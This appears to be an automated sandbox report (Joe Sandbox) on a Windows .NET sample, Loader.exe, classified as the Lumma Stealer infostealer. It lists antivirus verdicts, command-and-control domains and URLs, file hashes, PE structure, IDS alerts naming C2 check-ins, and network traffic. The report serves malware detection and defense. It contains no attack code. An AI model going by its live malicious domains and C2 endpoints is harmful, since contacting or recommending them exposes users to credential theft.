    Loader.exe53%ReversingLabsByteCode-MSIL.Spyware.Lummastealer
    Loader.exe100%AviraHEUR/AGEN.1352702
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://upx.sf.net0%URL Reputationsafe
    evoliutwoqm.shop0%Avira URL Cloudsafe
    stamppreewntnq.shop100%Avira URL Cloudphishing
    froytnewqowv.shop100%Avira URL Cloudphishing
    https://froytnewqowv.shop/apiMf100%Avira URL Cloudphishing
    https://froytnewqowv.shop/100%Avira URL Cloudphishing
    https://froytnewqowv.shop:443/api100%Avira URL Cloudphishing
    https://froytnewqowv.shop/b.y100%Avira URL Cloudphishing
    https://froytnewqowv.shop/5100%Avira URL Cloudphishing
    https://froytnewqowv.shop/api100%Avira URL Cloudmalware
    condedqpwqm.shop100%Avira URL Cloudphishing
    locatedblsoqp.shop100%Avira URL Cloudphishing
    millyscroqwp.shop100%Avira URL Cloudmalware
    caffegclasiqwp.shop100%Avira URL Cloudmalware
    traineiwnqo.shop100%Avira URL Cloudmalware
    stagedchheiqwo.shop100%Avira URL Cloudphishing
    NameIPActiveMaliciousAntivirus DetectionReputation
    froytnewqowv.shop
    188.114.97.3
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://froytnewqowv.shop/apitrue
      • Avira URL Cloud: malware
      unknown
      froytnewqowv.shoptrue
      • Avira URL Cloud: phishing
      unknown
      stamppreewntnq.shoptrue
      • Avira URL Cloud: phishing
      unknown
      condedqpwqm.shoptrue
      • Avira URL Cloud: phishing
      unknown
      evoliutwoqm.shoptrue
      • Avira URL Cloud: safe
      unknown
      locatedblsoqp.shoptrue
      • Avira URL Cloud: phishing
      unknown
      caffegclasiqwp.shoptrue
      • Avira URL Cloud: malware
      unknown
      millyscroqwp.shoptrue
      • Avira URL Cloud: malware
      unknown
      stagedchheiqwo.shoptrue
      • Avira URL Cloud: phishing
      unknown
      traineiwnqo.shoptrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://froytnewqowv.shop:443/apiRegAsm.exe, 00000002.00000002.2208570206.0000000001066000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      https://froytnewqowv.shop/5RegAsm.exe, 00000002.00000002.2208570206.000000000104F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      https://froytnewqowv.shop/RegAsm.exe, 00000002.00000002.2208570206.0000000001042000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2208570206.000000000104F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      https://froytnewqowv.shop/b.yRegAsm.exe, 00000002.00000002.2208570206.000000000100A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      https://froytnewqowv.shop/apiMfRegAsm.exe, 00000002.00000002.2208570206.000000000102F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://upx.sf.netAmcache.hve.6.drfalse
      • URL Reputation: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      188.114.97.3
      froytnewqowv.shopEuropean Union
      13335CLOUDFLARENETUStrue
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1501451
      Start date and time:2024-08-29 23:42:09 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 30s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:10
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Loader.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@5/6@1/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 98%
      • Number of executed functions: 16
      • Number of non-executed functions: 41
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 52.182.143.212
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: Loader.exe
      TimeTypeDescription
      17:43:00API Interceptor1x Sleep call for process: RegAsm.exe modified
      17:43:15API Interceptor1x Sleep call for process: WerFault.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      188.114.97.3Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
      • www.coinwab.com/kqqj/
      file.exeGet hashmaliciousLummaCBrowse
      • joxi.net/4Ak49WQH0GE3Nr.mp3
      Document_pdf.exeGet hashmaliciousFormBookBrowse
      • www.x0x9x8x8x7x6.shop/dscg/
      QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
      • filetransfer.io/data-package/zbi9vNYx/download
      z1209627360293827.exeGet hashmaliciousDBatLoader, FormBookBrowse
      • www.coinwab.com/kqqj/
      file.exeGet hashmaliciousLummaCBrowse
      • joxi.net/4Ak49WQH0GE3Nr.mp3
      Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
      • web.ad87h92j.com/4/t.bmp
      nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
      • web.ad87h92j.com/4/t.bmp
      QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
      • filetransfer.io/data-package/0U9QqTZ6/download
      QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • filetransfer.io/data-package/e0pM9Trc/download
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      froytnewqowv.shopNewInst.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      1YC268KfwD.exeGet hashmaliciousLummaCBrowse
      • 188.114.96.3
      PqyFc2vziL.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUScJX8BV8LYG.exeGet hashmaliciousAzorultBrowse
      • 172.67.128.117
      If doesnt work open it.exeGet hashmaliciousLummaCBrowse
      • 172.67.177.157
      https://uaj.sa/api/aHR0cHM6Ly9nb29nbGUuY29t&sig=ZDUxNjU0ZTllNzZkYTAxNWE4OTNkZTAyM2ZkZDA1MGViMGIzY2UyOTU1MzY1NGMyNjFlOTExM2ZiMzA5MzdmMg&exp=MTcyNDIzOTUzMQGet hashmaliciousHTMLPhisherBrowse
      • 1.1.1.1
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 188.114.96.3
      NewInst.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 188.114.96.3
      file.exeGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
      • 104.21.2.6
      https://5kirp.mellifluous5.com/5kiRp/Get hashmaliciousHTMLPhisherBrowse
      • 172.66.0.227
      https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1Get hashmaliciousUnknownBrowse
      • 104.17.246.203
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      a0e9f5d64349fb13191bc781f81f42e1If doesnt work open it.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 188.114.97.3
      NewInst.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      rBslc_Pymt-Hs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
      • 188.114.97.3
      Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
      • 188.114.97.3
      Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 188.114.97.3
      No context
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.1365232912533354
      Encrypted:false
      SSDEEP:192:UaPXNIeFy/8+j00BU/AjezEKZ4d1UzuiFjZ24IO8Z:bXc8+jvBU/AjeUdSzuiFjY4IO8Z
      MD5:923ED44D15C3AD3603274E3A83A7C928
      SHA1:79EED8A5BA2C1A096EA4B41DA1B48BA3BF987EE5
      SHA-256:850C9ED8DA76D68C0D0D19FE5F4482168442D73D7C59D496F1A05BC07886EBEF
      SHA-512:812AD952AAE553F0B9C1A85DDCA7F13EC58044598D4C5C7AAC51E0C0B7FA385128B7DCBE437941CC2FD4FBECFAF1EF3252FB89E2CD928B6C00A36DBB904DC3E4
      Malicious:false
      Reputation:low
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.4.1.3.8.1.6.7.4.2.8.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.4.1.3.8.2.1.1.1.7.7.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.5.9.f.d.0.7.-.5.8.7.a.-.4.f.3.3.-.8.e.7.e.-.2.f.1.2.2.e.6.b.e.1.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.1.4.c.7.1.7.-.3.a.d.0.-.4.4.e.1.-.a.7.7.8.-.f.a.a.f.e.1.7.5.1.4.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.d.4.-.0.0.0.1.-.0.0.1.4.-.b.b.4.b.-.9.e.6.a.5.c.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 15 streams, Thu Aug 29 21:43:01 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):106956
      Entropy (8bit):2.0819799847560376
      Encrypted:false
      SSDEEP:384:FkwWJM5Hnlo4hchAhz6Rb/L7R/gC5s2z7fbwdpnNf6Kln0746adiYIGB0ci9J88:Fkw5nTKvR/Rz7fbw9ccYH
      MD5:4AA791DEF5F7BDA2B63B8E9E9F029BC6
      SHA1:973224C527A9D2FA073D899CB8EDB5D4414CA389
      SHA-256:D6254E8A42223E26B9EF14716EC0A3E8727789149A013A2C9FB17B6A5DF6CA15
      SHA-512:D485C76D3B603C73FD9D92E5745F2FB4CCF544F4A878B674A01C491DF04DD495CC31BE87CBE67A1DD4563D012F4AE6DBAC7096E03A9A114DCEA8639178C4C120
      Malicious:false
      Reputation:low
      Preview:MDMP..a..... .......e..f........................H...........<....$...........J..........`.......8...........T...........XD..t]...........%...........'..............................................................................eJ.......'......GenuineIntel............T...........c..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):6290
      Entropy (8bit):3.722390522019953
      Encrypted:false
      SSDEEP:96:RSIU6o7wVetbB/6wYlQE/emI5aM4UA89bAnsf+rwIRAm:R6l7wVeJB/6wYlIprA89bAnsfL0Am
      MD5:8A9C06F04942863CD17E4EBB9E43D79E
      SHA1:B2CC9AC8B3414ABD767DBC2330BDF23E07E011F2
      SHA-256:188D43C2E7E6F94D0A13B30013E052A557766152A333C9075234B55DBD816AB6
      SHA-512:9E26805F2B0D7D613271A0A2BA438AEE1CC85CB6439446A328C9A97B6B4165C3A989F1DB88622244BD3242A93BE0BEAFD47C655E4E8D00EE80D5C07B9AB7EC1E
      Malicious:false
      Reputation:low
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.0.8.<./.P.i.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4628
      Entropy (8bit):4.448096440182059
      Encrypted:false
      SSDEEP:48:cvIwWl8zsbJg77aI9UnWpW8VYXPYm8M4JfuMsi6FD+q8otFM75QgLuOLuqrd:uIjf1I7eW7V6SJfuvNvtW5Bukuqrd
      MD5:6B7F54A0F806CD34902034D2EC501A6F
      SHA1:D6635D8F4014D34CC3ABCF77202D60BDB7E9DDB9
      SHA-256:9F6DF9A5C3D13DD53D41D63BBC323CBBC1BD77118A56F2F43478AEB9D57A6536
      SHA-512:65F474A38EDF41BBF676E467D35CBE69D26A35E53FD2D06A65F263AB419F67B8FB491C340A9F63E54EED34E3DFB8D3516B1BE7D4C8A6E85BE6FB4D6C090D9E7C
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477405" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Users\user\Desktop\Loader.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):42
      Entropy (8bit):4.0050635535766075
      Encrypted:false
      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
      MD5:84CFDB4B995B1DBF543B26B86C863ADC
      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
      Malicious:true
      Reputation:high, very likely benign file
      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):1835008
      Entropy (8bit):4.422365735348833
      Encrypted:false
      SSDEEP:6144:ISvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNk0uhiTw:TvloTyW+EZMM6DFye03w
      MD5:CCD89C469FA0AD720F4FF714E13A7349
      SHA1:4480E6900BD620B3AF8B32E4000780637C590601
      SHA-256:0E861CC1442947E67D826FB17594C58B6BFD81B6D19E414DBD22A4289C740225
      SHA-512:56200F91CF0455521FA21CFEA3288F66B85EF6A6F16845A15CBE8FF07DEC3B453522CACC04F113EB36980B34B370526162C335DCFBD7DCCED077CBB879ED828E
      Malicious:false
      Reputation:low
      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..k\.................................................................................................................................................................................................................................................................................................................................................._........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Entropy (8bit):7.987001082413136
      TrID:
      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      • Win32 Executable (generic) a (10002005/4) 49.78%
      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
      • Generic Win/DOS Executable (2004/3) 0.01%
      • DOS Executable Generic (2002/1) 0.01%
      File name:Loader.exe
      File size:318'464 bytes
      MD5:c7acff9e420db036ab543e95341b8c8b
      SHA1:de57cdf8ddcf91a4dcd617a7e7690dd1127b6a5e
      SHA256:dc644e8bfff8121042290307780d3b756f81beae58b452aada89033009883113
      SHA512:c3ea3475ce5d372b97d6489f6455e9ad202f99835841cbca8b7a39f79ad78a15fb3b58de22ac6e190f02203a3008dd895ae139a1fac3560801f1708fc704dc55
      SSDEEP:6144:LFQf6LuNVHMKDrLB0QyFsN0gCuR539QRdeZifOKTROQ4rW7O3hDmeJ5qnOg3:RQwuNVPrLBPyFsGzI5tilROni7O3hCe8
      TLSH:736423C1B3E86910CFE8EDB494711649B1C6CD8DCCA514E226241E237172FA5EEF4EAD
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...vK.f............................^.... ........@.. .......................@............`................................
      Icon Hash:00928e8e8686b000
      Entrypoint:0x44f25e
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Time Stamp:0x66D04B76 [Thu Aug 29 10:20:38 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
      Instruction
      jmp dword ptr [00402000h]
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x4f2080x53.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x242.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x520000xc.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x4f0d00x1c.text
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x20000x4d2640x4d40027e04c8f24197a05d3dadb3bef2fd0d2False0.9920547633495146data7.994081518610872IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rsrc0x500000x2420x4000b029f66d66c489e00f900d5feaf7e07False0.3017578125data3.5160679793070893IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0x520000xc0x2001effe9300242ab389d4b05283ba0b50aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_MANIFEST0x500580x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
      DLLImport
      mscoree.dll_CorExeMain
      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
      2024-08-29T23:43:00.286382+0200TCP2055488ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop)149704443192.168.2.5188.114.97.3
      2024-08-29T23:43:01.050251+0200TCP2055488ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop)149705443192.168.2.5188.114.97.3
      2024-08-29T23:43:01.536679+0200TCP2049812ET MALWARE Lumma Stealer Related Activity M2149705443192.168.2.5188.114.97.3
      2024-08-29T23:43:01.536679+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149705443192.168.2.5188.114.97.3
      2024-08-29T23:43:00.467801+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149704443192.168.2.5188.114.97.3
      2024-08-29T23:43:00.467801+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149704443192.168.2.5188.114.97.3
      2024-08-29T23:42:59.777044+0200UDP2055478ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop)15379953192.168.2.51.1.1.1
      TimestampSource PortDest PortSource IPDest IP
      Aug 29, 2024 23:42:59.800635099 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:42:59.800667048 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:42:59.800765038 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:42:59.802197933 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:42:59.802213907 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.286317110 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.286381960 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.290405035 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.290411949 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.290642023 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.332912922 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.344412088 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.344432116 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.344506979 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.467806101 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.467849970 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.467878103 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.467897892 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.467900991 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.467917919 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.467947006 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.468116999 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.468182087 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.469748974 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.469762087 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.469777107 CEST49704443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.469780922 CEST44349704188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:00.585799932 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.585833073 CEST44349705188.114.97.3192.168.2.5
